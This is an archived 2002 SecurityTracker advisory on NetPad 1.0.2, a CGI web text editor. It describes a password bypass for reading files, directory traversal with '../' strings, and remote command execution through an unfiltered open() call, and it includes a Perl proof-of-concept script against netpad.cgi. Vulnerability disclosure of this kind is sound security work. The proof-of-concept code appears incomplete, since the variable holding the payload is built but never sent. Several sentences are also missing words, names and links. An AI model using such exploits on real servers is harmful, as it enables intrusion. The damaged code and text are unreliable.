Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   NetPad Vendors:
NetPad Text Editing CGI Script Input Validation Flaws Let Remote Users View Files and Execute Shell Commands
SecurityTracker Alert ID:  1004288
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 14 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 1.0.2
Description:   A vulnerability was reported in's NetPad web-based text editor. A remote user can view files on the server and execute shell commands on the system.

b0iler and BrainRawt reported several input validation several vulnerabilities in the NetPad CGI script.

A remote user can supply directory traversal strings ('../') to change directories and view any file that is readable by the web server.

A remote user can execute commands on the server due to the lack of filtering on user-supplied input that is passed to an open() function call. A demonstration exploit for this vulnerability is provided in the Source Message.

The password security feature is apparently not required to be able to read files, only to write files, which may be counter to the vendor's description of the feature.

The vendor has reportedly been notified.

Impact:   A remote user can view files located anywhere on the partition that are readable by the web server. A remote user can execute arbitrary commands with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents

Subject:  LevCGI.coms NetPad 1.0.2 multiple vulnerabilities

Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities Advisory
Discovered By b0iler( and 

About Netpad:
<quote from>

Easy to install and use text editor for your web browser! This NotePad like
program allows you to open your files and pages online in your browser and
edit their contents through the browser without forcing you to re-upload
your changes all the time! Extremely effecient and a must have tool for all

</quote from>

According to the website,  ...NetPad has been downloaded 1225 times!

Vulnerable (tested) Versions:
NetPad v 1.0.2

Vendor Contact:
4-28-02 - Emailed


-- Password Bypass

1. The website claims "password security feature to prevent unauthorized 
    but this is NOT true.

    A password is not required to read files.  It is only required to write 
to files.

-- Path Traversal

2. Improper filtering of input allows one to enter the traditional 
"../../../" into
    the input field to crawl back through directories of the server hosting 
    allowing one to view any file readable by the webserver.

-- Command Execution

3. Due to improper usage of the open() function and input filtering, it is 
    for a malicious visitor to remotely execute commands on the server 

    Proof of Concept code can be found below............

Remote Command Execution Exploit (POC):

# exploit for levcgi's NetPad 1.0.2
# This could easily be done with any browser and alittle effort.
# requires LWP avaliable at
# also, the number of ../'s differs.  It depends on what $basedir
# is set to in the netpad.cgi script
# usage: perl http://site.tld/cgi-bin/netpad.cgi 

use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);

my $req = new HTTP::Request POST => $ARGV[0];
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }

my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have 
worked.\n"; }
else {  print "request failed.\n"; }


No matter how well one filters input to this program, we recommend that the
program itself be protected by htaccess.

Did you (Lev) say something about stupid people doing stupid things? - 

Send and receive Hotmail on your mobile device:


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC